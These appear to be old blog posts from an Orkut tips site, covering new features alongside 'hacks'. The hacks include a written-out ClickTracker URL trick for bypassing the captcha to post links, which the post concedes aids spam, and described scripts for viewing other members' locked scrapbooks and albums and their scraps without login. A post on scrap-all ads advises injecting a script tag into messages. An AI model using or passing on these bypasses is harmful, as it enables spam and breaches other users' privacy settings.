If you always wondered uploading 100 pics on orkut would consume an hell lot of time then here is some fantastic news. Orkut has introduced a new feature which allows you to upload multiple pics in a single click. So no more clicking, choosing and uploading individual images.

How to Upload Multiple Pics in One Click?

1.Navigate to this page (http://www.orkut.com/PhotosUpload.aspx?uid)

2.Follow the instructions written over there.

3.Now, You will be redirected to your album page.

4.Click on add photos option and you will experience this cool new feature.

New Update - Your Last Login Details

Most of you must have noticed this update. Orkut has just rolled out this feature that displays your last login details on your homepage. As an obvious guess, i feel this is another security related update which can help members track unauthorized account usage aka account hijacking issues. Since members can now track their account activity, this will surely help in avoiding and reducing account hijacking issues.

Orkut Just Got More Safer - Confirmation Before Navigating to External Links

Wow! This is one of the best updates on orkut if we look at it from the security point of view. Orkut now asks for a confirmation if you click on a link that is non orkut, google affiliated. This is an awesome step considering the loop holes which were being discovered now and then on orkut which posed a serious threat to the security of the members.

I was surfing around some scrapbooks and found quite a large number of encoded scripts in most of them. If you didn't get this, then you must look at the screenshot below.

Do you know what those numbers signify? They can be used to hide or mask the actual use of the script. So what if they actually mean to get your cookies and the worst part is you don't know it.So here are some tips you can use to see what actually lies beneath those numbers.What those numbers actually mean?

Well, i am not amused but many of the thousands will be after reading this post. Orkut Brains just discovered a way out to send links without filling in any captcha (word verification). Unfortunately, this means more spam on orkut.
Note : We already notified orkut about this flaw.

How to send links without the headache of filling captcha?

1. http://www.orkut.com/ClickTracker.aspx?url=//////www.yourlink.com
2. Edit the 'your link' in the link and paste them in your scraps.
3. Do NOT remove the six slashes
4. Enjoy Sending the links without filling the word verification
Note: 'http://' wont work. 'www' works flawlessly

Quote Messages in a Single Click :

This is one of my favourite scripts. I love using it because i love participating in community conversations. I would highly recommend you to use this one if you are a community talker

Hack - Find Owned Communities of Any Member!

As name suggests, this hack allows you to find all owned communities of any orkut member.

This hack works on the gid method. Every profile on orkut has a different gid (in case they have a display pic uploaded). This script searches for the gid of a member, inserts it in the search box and performs the search operation to enlist all communities owned by that particular member.

How do i find all owned communities of a member?

1. Navigate to the profile page of the member

2. Run this script in the adress bar.

You can check your (or any other's) scraps without login to Orkut just by Entering Profile UID in the following program.
You can get your Profile UID by looking at the end of your Orkut Profile URL:

Now Open this file in the Internet Explorer & Enter the Profile UID & click on "Show Scrap" button to load the scraps. Only First 10 Scraps will be displayed. This userscript is an extension of our previous post to view locked albums. As it is very clear that running javascript everytime you want to view locked albums can be tiring . A quick introduction to the post - Using this hack, you can view locked scrapbooks which according to orkut, is not outsourced to non-friends or strangers.

How to use this hack?

1. Navigate to the profile which has disallowed non-friends to view his/her scrapbook
2. Have a look at the script below

Orkut is Requesting You to Choose New Features!

There is a poll going on at this orkut help page. You can participate in the poll and suggest new features which could make orkuting more enjoyable.

From the Suggestion/Poll Page : Please tell us which new features you'd like to see on orkut.com. If your favorite idea isn't listed, just select "I have another idea." While we don't reply to individual suggestions, we do review them all and will keep them in mind for future development.

If you ever wondered where those 100 pics in album would fit in, or wouldn't it be a mess navigating within that huge number then here is a twist. Orkut has now added a new feature which enables you to organize your orkut albums.

Here is what orkut had to say on this:

Now that you can have 100 photos, we thought you might want to organize them into multiple albums to make it easier for you and others to enjoy. We were looking for ways to group all of our photos on orkut based on the different experiences that they shared. Today, orkut will be launching Photo Albums! Have many photos from a recent trip? Create an album specifically for that trip. Lots of pics from a recent night out with friends? Create another album with just those photos!
All of your current photos will be stored by default in their own album. Feel free to setup new ones by going to "photos" from your homepage. Once you have created an album, simply click on it and start uploading new photos inside. You can also change the cover photo by clicking on "edit" of the photo that you want to appear, and then selecting "album cover."
All of us from orkut look forward to sharing our latest photos with you!

Situation : Joined too Many Communities!

Orkut member queries if there is a simpler way to unjoin communities. He writes:
I had associated my id with too many communities(around 280) and now I want to unjoin almost all the communities except few.As I had 280 communities,Its a tough job to unjoin each community manually. So I am requesting orkut plus to provide me a way through which I can unjoin almost all communities.

Solution: We currently do not have a refined software to unjoin selected communities. You can follow following tips to make your work easier.

Make a note of the communities you would want to re-join.

Orkut Goes After Unethical Profiles - Threatens To Report To Law Authorities!

After the much highlighted XSS debacle, it looks as if orkut has finally decided to take care of unethical minds on orkut. They are now issuing warnings on their homepage.

To be exact, these lines are being displayed as a security caution:

Security caution: Please do not use your orkut account to impersonate or harass other users. Violations of the orkut terms of service will lead to the suspension of your account. For serious violations, we can and will share information with local law enforcement agencies in your country. Be safe and keep orkut beautiful.

On a positive note, this was very much required to curb impersonation issues and the fact that official warnings make the work much easier.

Not long back orkut introduced a feature which enabled members to choose with whom they wanted to share their private data and one always felt a very important feature was missing. Better late than never, they have made that feature live.

Hide Your Scrapbook From Strangers

No official word from orkut, but this feature is very much accessible. You just need to navigate to the privacy settings page of you orkut account to set your preferences.

We guess everyone out here is fed up with scrap all spam. Those who once used to scrap all their friends to greet, now have an advertisement below their scraps. No doubt this looks odd and embarrassing. So today, we'll provide you a few tips to disable this advertisement below the scraps.
Here are a Couple of things You Can Do Disable Advertisements:

a> Use a scrap all script which is ad free :
You can use Scrap All provided by Orkut Plus! (No Advertisements) - Click Here to Install
Now Navigate to http://www.orkut.com/ScrapAll to use this feature
Send scraps to your friends without any advertisement.

b> Disable Advertisements in Existing Scrap All Scripts :
Those who feel they have a better scrap all installed or are not comfortable installing/uninstalling again and again can use this method to disable advertisements.

Write the message in the text box which you want to send to all your friends.

Now to disable the advertisements write <.script> without "." as shown in the screenshot.
